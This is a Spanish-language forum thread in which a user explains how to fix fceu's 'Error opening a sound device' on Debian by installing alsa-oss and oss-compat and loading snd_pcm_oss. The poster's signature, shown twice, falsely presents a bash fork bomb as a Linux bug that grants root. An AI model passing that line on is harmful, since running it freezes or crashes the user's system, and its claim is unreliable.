fceu error: Initializing soundError opening a sound device [SOLUCIONADO]

Hola.
Si teneis problemas de sonido con emuladores, como fceu, seguramente lo solucioneis de la siguiente manera. A mi el problema que me daba era:
Initializing sound...Error opening a sound device

El problema era debido a que intenta coger oss en un sistema con alsa. Esto se soluciona con:
#apt-get install alsa-oss oss-compat
Mirad que teneis el modulo snd_pcm_oss (lsmod |grep snd_pcm_oss). Sino, pues haced un modprobe snd_pcm_oss (o ponerlo en /etc/modules para que os lo coja cada vez que arranca debian).

¿Sabeis que Linux tiene un bug en el que un usuario puede adquirir privilegios de root??? :(){ :|:& };
darkxer0x escribió:

Hola.
Si teneis problemas de sonido con emuladores, como fceu, seguramente lo solucioneis de la siguiente manera. A mi el problema que me daba era:
Initializing sound...Error opening a sound device

El problema era debido a que intenta coger oss en un sistema con alsa. Esto se soluciona con:
#apt-get install alsa-oss oss-compat

Mmmm ¿instalasté desde el net-install verdad?

No, porque tenia wifi, y las tarjetas wireless no te las coge en la instalacion. Me baje el CD1, y asi ya tenia por lo menos entorno grafico.

¿Sabeis que Linux tiene un bug en el que un usuario puede adquirir privilegios de root??? :(){ :|:& };

Relacionado con fceu error: Initializing soundError opening a sound device [SOLUCIONADO]